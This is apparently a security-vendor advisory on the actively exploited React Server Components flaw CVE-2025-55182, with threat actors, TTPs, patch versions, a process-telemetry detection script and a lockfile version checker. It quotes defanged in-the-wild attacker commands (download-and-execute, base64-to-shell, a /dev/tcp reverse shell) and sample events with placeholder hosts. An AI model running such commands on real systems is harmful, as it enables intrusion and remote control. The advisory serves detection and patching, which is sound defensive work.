React2Shell: Critical CVE-2025-55182 Remote Code Execution Vulnerability in React Native and React Server Components Actively Exploited
- Rescana

Executive Summary
A critical remote code execution (RCE) vulnerability, CVE-2025-55182, has been identified in React Native and related frameworks implementing React Server Components (RSC). This vulnerability, dubbed "React2Shell," is being actively exploited in the wild. The flaw arises from insecure deserialization within the RSC Flight protocol, enabling unauthenticated attackers to execute arbitrary code on affected servers. Attackers are leveraging this vulnerability to deploy a variety of malware, including cryptominers, remote access trojans (RATs), and web shells, as well as to facilitate initial access, lateral movement, and data exfiltration. The exploitation is widespread, targeting cloud environments, higher education, government, and enterprise sectors globally. Immediate patching and threat hunting are strongly advised.
Threat Actor Profile
Multiple threat actors, including advanced persistent threat (APT) groups and financially motivated cybercriminals, are exploiting CVE-2025-55182. Notably, the Chinese state-sponsored group CL-STA-1015 (UNC5174) and North Korean group UNC5342 have been observed leveraging this vulnerability for initial access and post-exploitation activities. These actors are known for rapid exploitation of N-day vulnerabilities and for deploying sophisticated malware such as EtherRAT and Noodle RAT. Additionally, opportunistic cybercriminals are using automated scanning and exploitation tools to compromise exposed servers, often deploying cryptominers and botnet loaders. The diversity of actors underscores the criticality and broad appeal of this vulnerability.
Technical Analysis of Malware/TTPs
The root cause of CVE-2025-55182 is insecure deserialization in the react-server package, specifically within the RSC Flight protocol. Attackers craft malicious HTTP POST requests containing payloads that, when deserialized by the vulnerable server, result in arbitrary code execution. This attack vector does not require authentication and is effective against default configurations, making exploitation trivial and highly reliable.
Upon successful exploitation, attackers typically execute base64-encoded shell commands to evade detection and perform system reconnaissance. Common post-exploitation activities include downloading and executing additional payloads using curl or wget, establishing persistence via Linux backdoors such as KSwapDoor (masquerading as kswapd1) and Auto-color (disguised as a PAM library), and deploying web shells like fm.js (a Node.js-based file manager). For lateral movement, attackers enumerate internal networks and cloud credentials, often using automated scripts.
Malware families observed in these campaigns include Cobalt Strike (for post-exploitation and lateral movement), XMRig (for cryptomining), EtherRAT (leveraging Ethereum smart contracts for command and control), and Noodle RAT (a backdoor favored by Chinese-speaking actors). Attackers also deploy Mirai botnet loaders in containerized environments such as Kubernetes and Docker.
MITRE ATT&CK techniques mapped to these campaigns include T1190 (Exploit Public-Facing Application), T1059 (Command and Scripting Interpreter), T1105 (Ingress Tool Transfer), T1071 (Application Layer Protocol), T1566 (Phishing, in related EtherRAT campaigns), and T1219 (Remote Access Tools).
Exploitation in the Wild
Active exploitation of CVE-2025-55182 has been confirmed by multiple security vendors, including Palo Alto Networks Unit42, Wiz, and Amazon Threat Intelligence. Attackers are conducting mass scanning for vulnerable endpoints, followed by automated exploitation. Evidence of compromise includes the deployment of cryptominers, RATs, and web shells, as well as the use of reverse shells to establish persistent access.
Notable malicious commands observed in the wild (defanged for safety) include:
/bin/sh -c wget hxxp://46.36.37[.]85:12000/sex.sh && bash sex.sh
/bin/sh -c (curl -sL hxxp://45.32.158[.]54/5e51aff54626ef7f/x86_64 -o /tmp/x86_64;chmod 777 /tmp/x86_64;/tmp/x86_64)
/bin/sh -c echo <base64-encoded text> | base64 -d | sh | base64 -w0
bash -c bash -i >& /dev/tcp/38.162.112[.]141/8899 0>&1
(Cobalt Strike reverse shell)
/bin/sh -c cd /tmp && wget -q -O fm.js hxxps://raw.githubusercontent.com/laolierzi-commits/phpbd/refs/heads/main/rjs/filemanager-standalone.js && nohup node fm.js > /dev/null 2>&1 &
Attackers are also targeting cloud and container environments, attempting to deploy Mirai botnet loaders and cryptominers in Kubernetes and Docker instances. Credential theft and lateral movement are facilitated through automated scripts and reconnaissance commands.
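The commands listed above share a few traits that a defender can hunt for in process-creation telemetry: a shell or downloader spawned directly by the web runtime (node or bun), base64-decoded text piped into sh, a download chained into execution, or a bash /dev/tcp reverse shell. The script below is an added example written for this advisory, not code from Rescana or from the React project; it assumes a simplified tab-separated "parent_name<TAB>child_cmdline" event format and uses constructed sample events with TEST-NET addresses rather than the real indicators quoted above.

```python
import re
from dataclasses import dataclass

# Constructed sample events (parent process name, TAB, child command line).
# They mimic the shape of the post-exploitation activity described above;
# hosts and addresses are placeholders, not indicators from the advisory.
SAMPLE_EVENTS = """\
node\t/bin/sh -c echo ZWNobyBoaQ== | base64 -d | sh | base64 -w0
node\t/bin/sh -c cd /tmp && wget -q -O fm.js https://example.invalid/fm.js && nohup node fm.js &
bun\tbash -c bash -i >& /dev/tcp/192.0.2.10/8899 0>&1
node\tnode /srv/app/server.js
nginx\t/bin/sh -c wget https://example.invalid/x.sh
node\t/bin/sh -c npm run build
"""

WEB_RUNTIMES = {"node", "bun"}              # parents of interest for this hunt
SUSPICIOUS_CHILDREN = {"sh", "bash", "curl", "wget"}
PATTERNS = [
    ("base64-decoded command piped to a shell",
     re.compile(r"base64\s+(-d|--decode)\b.*\|\s*(ba)?sh\b")),
    ("bash reverse shell via /dev/tcp", re.compile(r"/dev/tcp/")),
    ("download chained into execution",
     re.compile(r"\b(curl|wget)\b.*(&&|;|\|).*\b(sh|bash|node|chmod)\b")),
]

@dataclass
class Finding:
    parent: str
    cmdline: str
    reason: str

def analyze_events(text: str) -> list[Finding]:
    """Flag shell/downloader children of node or bun whose command line matches a known pattern."""
    findings = []
    for line in text.splitlines():
        parent, _, cmdline = line.partition("\t")
        if parent not in WEB_RUNTIMES:
            continue                       # e.g. nginx spawning wget is a different story
        tokens = cmdline.split()
        child = tokens[0].rsplit("/", 1)[-1] if tokens else ""   # "/bin/sh" -> "sh"
        if child not in SUSPICIOUS_CHILDREN:
            continue                       # node spawning node (the app itself) is normal
        for reason, pattern in PATTERNS:
            if pattern.search(cmdline):
                findings.append(Finding(parent, cmdline, reason))
                break                      # one reason per event is enough for triage
    return findings

if __name__ == "__main__":
    for f in analyze_events(SAMPLE_EVENTS):
        print(f"[{f.parent}] {f.reason}: {f.cmdline}")
```

A plain "sh -c npm run build" child of node is deliberately not flagged, so the rule set stays quiet on ordinary build and deploy activity while catching the three malicious shapes.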
Victimology and Targeting
The exploitation of CVE-2025-55182 is global in scope, with confirmed targeting of higher education, government, chemical industry, cloud service providers, and general enterprise environments. Geographically, attacks have been observed in Asia (notably China and North Korea), North America (including the United States), and across global cloud infrastructure. The opportunistic nature of the exploitation, combined with the involvement of sophisticated APT groups, indicates that any organization running vulnerable versions of React Native, Next.js, or related frameworks is at risk, regardless of sector or geography.
Mitigation and Countermeasures
Immediate action is required to mitigate the risk posed by CVE-2025-55182. Organizations should:
Patch all affected systems without delay. For React, upgrade to 19.0.1, 19.1.2, or 19.2.1. For Next.js, upgrade to 16.0.7, 15.5.7, 15.4.8, 15.3.6, 15.2.6, 15.1.9, or 15.0.5. Ensure that any framework or plugin bundling vulnerable react-server packages is updated to a secure version.
Conduct threat hunting using the provided indicators of compromise (IOCs), including suspicious IP addresses, URLs, and malware hashes. Review logs for evidence of suspicious child processes spawned by node or bun processes, especially those invoking curl, wget, bash, or similar tools.
Isolate and remediate any compromised systems. Remove unauthorized web shells, backdoors, and malware. Rotate credentials and review access logs for signs of lateral movement or data exfiltration.
Implement network segmentation and least privilege access controls to limit the blast radius of potential compromises. Monitor for anomalous outbound connections, particularly to known malicious IP addresses and domains.
Educate development and operations teams about the risks associated with insecure deserialization and the importance of timely patching.
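The patch guidance above lists a separate fixed release for each React and Next.js minor line, so "is my version at least 19.2.1" is the wrong test for an installation on 19.1.x. The following script is an added example, not tooling from Rescana or the React project; it compares every react and next entry in a package-lock.json against the fixed version of the same major.minor line, reports release lines the advisory does not cover as "unknown", and assumes pre-release tags can be dropped for the comparison. The lockfile it reads is constructed inline.

```python
import json
import re

# Minimum fixed version per release line, as listed in the advisory above.
FIXED_VERSIONS = {
    "react": ["19.0.1", "19.1.2", "19.2.1"],
    "next": ["16.0.7", "15.5.7", "15.4.8", "15.3.6", "15.2.6", "15.1.9", "15.0.5"],
}

# Constructed package-lock.json (lockfileVersion 3 layout) for the demo.
SAMPLE_LOCK = json.dumps({
    "name": "demo-app", "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "version": "1.0.0"},
        "node_modules/react": {"version": "19.2.0"},
        "node_modules/next": {"version": "15.5.6"},
        "node_modules/some-lib/node_modules/react": {"version": "19.2.1"},
    },
})

def parse_version(v: str) -> tuple:
    """Parse MAJOR.MINOR.PATCH; a pre-release suffix such as '-canary.3' is dropped (assumption)."""
    m = re.match(r"^(\d+)\.(\d+)\.(\d+)", v)
    if not m:
        raise ValueError(f"unparseable version: {v}")
    return tuple(int(x) for x in m.groups())

def assess(package: str, installed: str) -> str:
    """Return 'fixed', 'vulnerable', or 'unknown' (release line absent from the fix list)."""
    inst = parse_version(installed)
    for fixed in FIXED_VERSIONS[package]:
        fx = parse_version(fixed)
        if fx[:2] == inst[:2]:               # compare only within the same major.minor line
            return "fixed" if inst >= fx else "vulnerable"
    return "unknown"

def audit_lockfile(lock_json: str) -> dict:
    """Assess every react/next entry (including nested copies) in a lockfile's 'packages' map."""
    data = json.loads(lock_json)
    results = {}
    for path, meta in data.get("packages", {}).items():
        # "node_modules/a/node_modules/react" -> "react"; "" is the root project
        name = path.rsplit("node_modules/", 1)[-1] if path else meta.get("name", "")
        if name in FIXED_VERSIONS and "version" in meta:
            results[path] = assess(name, meta["version"])
    return results

if __name__ == "__main__":
    for path, verdict in audit_lockfile(SAMPLE_LOCK).items():
        print(f"{verdict:10} {path}")
```

Nested copies matter because a dependency can pin its own older react, and an "unknown" verdict (for example React 18.x) means the line is outside this advisory's fix list, not that it is safe.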
About Rescana
Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to assess, monitor, and mitigate cyber risks across their digital supply chain. Our platform leverages advanced threat intelligence, continuous monitoring, and automated workflows to help organizations stay ahead of emerging threats and ensure compliance with industry standards. For more information about how Rescana can help secure your organization, or for any questions regarding this advisory, please contact us at ops@rescana.com.